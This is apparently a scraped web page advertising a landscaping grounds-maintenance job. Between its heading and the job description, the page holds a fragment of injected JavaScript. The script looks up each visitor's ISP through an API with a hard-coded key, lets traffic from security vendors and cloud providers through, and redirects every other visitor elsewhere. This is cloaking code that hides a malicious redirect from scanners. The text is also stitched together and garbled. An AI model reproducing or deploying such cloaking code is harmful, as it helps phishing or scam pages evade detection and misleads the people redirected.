Landscaping Grounds Maintenance Laborer
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Landscaping Grounds Maintenance Laborer to join our team in Nan, Maryland.
Responsibilities:
- Maintain and service lawns, gardens, and outdoor spaces, including mowing, trimming, edging, and planting.
- Perform landscaping tasks such as planting, mulching, and shrubbery care.
- Operate basic landscaping equipment and tools safely and efficiently.
- Assist with seasonal clean-up, debris removal, and snow removal when necessary.
- Ensure all work areas are safe, clean, and well-maintained.
Skills & Qualifications:
- Ability to perform physical labor outdoors in various weather conditions.
- Strong work ethic, reliability, and attention to detail.
- Ability to follow instructions and work as part of a team.
- Basic knowledge of landscaping tools and safety procedures preferred.
Benefits:
- Competitive pay based on experience.
- Health and wellness benefits.
- Paid time off and holiday pay.
- Opportunities for growth and skill development.